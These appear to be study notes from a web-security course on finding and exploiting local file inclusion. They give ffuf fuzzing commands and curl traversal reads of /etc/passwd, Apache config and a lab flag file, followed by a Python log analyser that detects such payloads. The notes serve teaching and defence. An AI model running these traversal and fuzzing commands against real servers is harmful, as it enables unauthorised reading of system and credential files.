# Intro

- It is crucial to understand how file inclusion attacks work and how we can manually craft advanced payloads and use custom techniques to reach remote code execution
- This is because in many cases, exploiting the vulnerability may require a custom payload that matches the target's specific configuration or bypasses WAF filters
- Nonetheless, there are many automated methods that can help us quickly identify and exploit trivial LFI vulnerabilities
- We can utilize fuzzing tools to test a huge list of common LFI payloads and see if any of them work, or we can utilize specialized LFI tools to test for such vulnerabilities

# Fuzzing Parameters

- While HTML forms may be well tested and secured, the page may expose other parameters unrelated to HTML forms that a normal user would never access
- This is why it may be important to fuzz for exposed parameters, as they tend not to be as secure as public ones

## Fuzz for Common GET Parameters

- Use the `burp-parameter-names.txt` wordlist found at `seclists/Discovery/Web-Content/burp-parameter-names.txt`

```bash
# -fs 2287 filters out responses with the default page size, so only parameters that change the page are shown
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
```

- Once we identify an exposed parameter that isn't linked to any forms we tested, we can perform all of the LFI tests discussed in this module

## LFI Wordlists

- While manual testing is more reliable for discovering LFI vulnerabilities, in many cases we may want to run a quick test on a parameter to see if it is vulnerable to any common LFI payload, which saves time in web apps where we need to test for many different vulnerabilities
- There are a number of [LFI Wordlists](https://github.com/danielmiessler/SecLists/tree/master/Fuzzing/LFI) we can use for this scan
- A good wordlist is [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt), as it contains various bypasses and common files, which makes it easy to run several tests at once
- We can use this wordlist to fuzz the `?language=` parameter we have been testing throughout the module, as follows

```bash
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
```

# Fuzzing Server Files

- In addition to fuzzing LFI payloads, there are different server files that may be helpful in our LFI exploitation, so it would be helpful to know where such files exist and whether we can read them
- Such files include:
  - `Server webroot path`
  - `server configurations file`
  - `server logs`

## Server Webroot

- We may need to know the full server webroot path to complete our exploitation in some cases
- For example, if we wanted to locate a file we uploaded, but we cannot reach its `/uploads` directory through relative paths (e.g. `../../uploads`)
- In such cases, we may need to figure out the server webroot path so that we can locate our uploaded files through absolute paths instead of relative paths
- To do so, we can fuzz for the `index.php` file through common webroot paths, which we can find in this [wordlist for Linux](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-linux.txt) or this [wordlist for Windows](https://github.com/danielmiessler/SecLists/blob/master/Discovery/Web-Content/default-web-root-directory-windows.txt)
- Depending on our LFI situation, we may need to add a few back directories (e.g. `../../../../`), and then add our `index.php` afterwards

```bash
# each wordlist entry is a candidate webroot; a hit means index.php was included from that absolute path
ffuf -w /usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
```

## Server Logs/Configs

- We need to know the correct logs directory to be able to perform the log poisoning attacks we discussed
- Furthermore, as we just discussed, we may also need to read the server configuration to be able to identify the server webroot path and other important information (like the logs path!)
- To do so, we may also use the [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) wordlist, as it contains many of the server log and configuration paths we may be interested in
- If we wanted a more precise scan, we can use this [wordlist for Linux](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Linux) or this [wordlist for Windows](https://raw.githubusercontent.com/DragonJAR/Security-Wordlist/main/LFI-WordList-Windows), though they are not part of `seclists`, so we need to download them first

```bash
# wordlist entries are absolute paths (e.g. etc/apache2/apache2.conf), reached with enough ../ to hit the filesystem root
ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
```

- As we can see, the scan returned over 60 results, many of which were not identified with the [LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt) wordlist, which shows us that a precise scan is important in certain cases
- Now, we can try reading any of these files to see whether we can get their content. We will read `/etc/apache2/apache2.conf`, as it is a known path for the Apache server configuration:

```bash
curl http://<SERVER_IP>:<PORT>/index.php?language=../../../../etc/apache2/apache2.conf
```

# LFI Tools

- The most common LFI tools are [LFISuite](https://github.com/D35m0nd142/LFISuite), [LFiFreak](https://github.com/OsandaMalith/LFiFreak), and [liffy](https://github.com/mzfr/liffy). We can also search GitHub for various other LFI tools and scripts, but in general, most tools perform the same tasks, with varying levels of success and accuracy.
- Unfortunately, most of these tools are not maintained and rely on the outdated `python2`, so using them may not be a long-term solution

# Exercise

- ping test

![[images/Pasted image 20251220205908.png]]

- nmap scan

![[images/Pasted image 20251220205944.png]]

- visit page - no language picker

![[images/Pasted image 20251220205932.png]]

- FUZZ for common GET parameters

```bash
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://94.237.56.175:55371/index.php?FUZZ=value' -fs 2309
```

![[images/Pasted image 20251220210234.png]]

- Run an LFI wordlist against the `view` parameter found above

```bash
ffuf -w /usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://94.237.56.175:55371/index.php?view=FUZZ' -fs 1935
```

- Looks like we can read arbitrary files with a sufficient number of `../`

![[images/Pasted image 20251220210401.png]]

- try to `curl` `/etc/passwd`

![[images/Pasted image 20251220210731.png]]

- now try to `curl` `/flag.txt`

```bash
curl http://94.237.56.175:55371/index.php?view=../../../../../../../../../../../../../../../../../../../../../../../../../flag.txt
```

![[images/Pasted image 20251220211617.png]]
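From the defensive side, the fuzzing described above (parameter-name fuzzing, LFI wordlists with encoded and `....//` bypasses, absolute-path reads of files like `/etc/apache2/apache2.conf`) leaves a recognisable trail in the web server's access log. The following Python is an added example, not code from the module or from any of the tools it lists; the log lines, the sensitive-path prefixes and the parameter-name threshold are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl, unquote

# Combined-log-format request line -> (source IP, request target, status, size)
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*" (\d{3}) (\d+|-)')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')  # ../ or ..\ once the value is decoded
SENSITIVE_RE = re.compile(r'^(?:/etc/|/var/log/|/proc/self/|[A-Za-z]:\\)', re.I)  # assumed prefixes
PARAM_FUZZ_THRESHOLD = 4  # distinct parameter names from one IP to one path (assumed value)

def decode_param(value, rounds=3):
    """Percent-decode repeatedly so double-encoded payloads (%252e%252e) are compared decoded."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_lfi_payload(value):
    """True when the decoded value is a traversal sequence or an absolute sensitive path."""
    v = decode_param(value).replace('\x00', '')  # ignore null-byte truncation tricks
    return bool(TRAVERSAL_RE.search(v) or SENSITIVE_RE.match(v))

def analyze(log_text):
    """Return (LFI payload hits, source IPs that look like they are fuzzing parameter names)."""
    hits, names_by_src = [], defaultdict(set)
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, target, status, _size = m.groups()
        parts = urlsplit(target)
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            names_by_src[(src, parts.path)].add(name)
            if is_lfi_payload(value):
                hits.append({'src': src, 'param': name, 'payload': decode_param(value), 'status': int(status)})
    fuzzers = sorted({src for (src, _), names in names_by_src.items() if len(names) >= PARAM_FUZZ_THRESHOLD})
    return hits, fuzzers

# Constructed sample log lines (not from the page): a benign request, LFI payloads, and a parameter-name fuzz
SAMPLE_LOG = """\
10.0.0.5 - - [20/Dec/2025:20:58:01 +0000] "GET /index.php?language=es HTTP/1.1" 200 2287
10.0.0.9 - - [20/Dec/2025:20:58:02 +0000] "GET /index.php?view=../../../../etc/passwd HTTP/1.1" 200 1935
10.0.0.9 - - [20/Dec/2025:20:58:03 +0000] "GET /index.php?language=..%252f..%252fetc%252fapache2%252fapache2.conf HTTP/1.1" 200 4120
10.0.0.9 - - [20/Dec/2025:20:58:04 +0000] "GET /index.php?language=....//....//etc/passwd%00.php HTTP/1.1" 200 1935
10.0.0.9 - - [20/Dec/2025:20:58:05 +0000] "GET /index.php?language=/etc/apache2/apache2.conf HTTP/1.1" 200 4120
10.0.0.7 - - [20/Dec/2025:20:58:06 +0000] "GET /index.php?id=value HTTP/1.1" 200 2287
10.0.0.7 - - [20/Dec/2025:20:58:06 +0000] "GET /index.php?page=value HTTP/1.1" 200 2287
10.0.0.7 - - [20/Dec/2025:20:58:06 +0000] "GET /index.php?file=value HTTP/1.1" 200 2287
10.0.0.7 - - [20/Dec/2025:20:58:06 +0000] "GET /index.php?view=value HTTP/1.1" 200 2287
"""
```

Running `analyze(SAMPLE_LOG)` flags the four payload requests from 10.0.0.9 and reports 10.0.0.7 as a parameter-name fuzzer; a `-fs`-style size filter on the attacker's side shows up here as many same-size responses to different parameter names.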